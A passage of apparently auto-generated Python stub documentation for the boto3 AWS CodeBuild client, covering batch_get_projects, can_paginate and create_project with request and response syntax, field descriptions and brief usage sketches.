- **logsConfig** *(dict) --*
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **projectsNotFound** *(list) --*
The names of build projects for which information could not be found.
- *(string) --*
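**Examples**
A brief sketch, with hypothetical project names, that prints each project's environment settings and any webhook filter groups (a build is triggered when at least one filter group passes, and a group passes only if every filter in it matches):
::
    import boto3

    client = boto3.client('codebuild')
    response = client.batch_get_projects(names=['my-project', 'my-other-project'])
    for project in response['projects']:
        env = project['environment']
        print(project['name'], env['type'], env['computeType'], env['image'])
        for group in project.get('webhook', {}).get('filterGroups', []):
            print('  filter group:', [(f['type'], f['pattern']) for f in group])
    for name in response['projectsNotFound']:
        print('project not found:', name)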
:type names: list
:param names: **[REQUIRED]**
The names of the build projects.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
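**Examples**
A short sketch of the intended use; ``list_builds`` is an AWS CodeBuild operation that supports pagination:
::
    import boto3

    client = boto3.client('codebuild')
    if client.can_paginate('list_builds'):
        paginator = client.get_paginator('list_builds')
        for page in paginator.paginate():
            print(page['ids'])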
"""
pass
def create_project(self, name: str, source: Dict, artifacts: Dict, environment: Dict, serviceRole: str, description: str = None, secondarySources: List = None, secondaryArtifacts: List = None, cache: Dict = None, timeoutInMinutes: int = None, queuedTimeoutInMinutes: int = None, encryptionKey: str = None, tags: List = None, vpcConfig: Dict = None, badgeEnabled: bool = None, logsConfig: Dict = None) -> Dict:
"""
Creates a build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/CreateProject>`_
**Request Syntax**
::
response = client.create_project(
name='string',
description='string',
source={
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
secondarySources=[
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
artifacts={
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
secondaryArtifacts=[
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
cache={
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
environment={
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
serviceRole='string',
timeoutInMinutes=123,
queuedTimeoutInMinutes=123,
encryptionKey='string',
tags=[
{
'key': 'string',
'value': 'string'
},
],
vpcConfig={
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
badgeEnabled=True|False,
logsConfig={
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
)
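The request syntax above lists every accepted field. As a minimal sketch, only the five required parameters need to be supplied; the project name, repository URL, image, and role ARN below are hypothetical placeholders:
::
    import boto3

    client = boto3.client('codebuild')
    response = client.create_project(
        name='my-project',
        source={
            'type': 'GITHUB',
            'location': 'https://github.com/example/example-repo.git',
        },
        artifacts={'type': 'NO_ARTIFACTS'},
        environment={
            'type': 'LINUX_CONTAINER',
            'image': 'aws/codebuild/standard:2.0',
            'computeType': 'BUILD_GENERAL1_SMALL',
        },
        serviceRole='arn:aws:iam::123456789012:role/my-codebuild-role',
    )
    print(response['project']['arn'])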
**Response Syntax**
::
{
'project': {
'name': 'string',
'arn': 'string',
'description': 'string',
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'artifacts': {
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'encryptionKey': 'string',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'created': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
},
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'badge': {
'badgeEnabled': True|False,
'badgeRequestUrl': 'string'
},
'logsConfig': {
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
- **project** *(dict) --*
Information about the build project that was created.
- **name** *(string) --*
The name of the build project.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build project.
- **description** *(string) --*
A description that makes the build project easy to identify.
- **source** *(dict) --*
Information about the build input source code for this build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
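As a minimal sketch of the formats above (the region, repository, and file names are placeholders, not values prescribed by this API), a ``source`` object for an AWS CodeCommit repository could look like this::

    source = {
        'type': 'CODECOMMIT',
        # HTTPS clone URL of the repository (placeholder region and repo name)
        'location': 'https://git-codecommit.us-east-1.amazonaws.com/v1/repos/my-repo',
        'gitCloneDepth': 1,           # shallow clone; omit to fetch full history
        'buildspec': 'buildspec.yml'  # optional if a buildspec is in the source root
    }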
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **artifacts** *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
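To make the naming rules above concrete, here is an illustrative helper (not part of the API) that computes the output key from ``path`` , ``namespaceType`` , and ``name`` ::

    def artifact_key(path, namespace_type, name, build_id):
        """Compute the S3 key CodeBuild would use, per the rules above."""
        parts = []
        if path:
            parts.append(path.strip('/'))
        if namespace_type == 'BUILD_ID':
            parts.append(build_id)
        if name and name != '/':
            parts.append(name)
        return '/'.join(parts)

    artifact_key('MyArtifacts', 'BUILD_ID', 'MyArtifact.zip', 'abc123')
    # -> 'MyArtifacts/abc123/MyArtifact.zip'
    artifact_key('', 'NONE', '/', 'abc123')
    # -> '' (the root of the output bucket)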
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build project.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to either of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
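For example, a ``cache`` object that combines the two Git-friendly local modes (a sketch; ``location`` is ignored for ``LOCAL`` caches) could be::

    cache = {
        'type': 'LOCAL',
        'modes': [
            'LOCAL_DOCKER_LAYER_CACHE',  # needs privilegedMode and a Linux environment
            'LOCAL_SOURCE_CACHE'
        ]
    }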
- **environment** *(dict) --*
Information about the build environment for this build project.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
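For example, a variable list that keeps a secret in Parameter Store instead of plaintext (the parameter name is a placeholder) might be::

    environmentVariables = [
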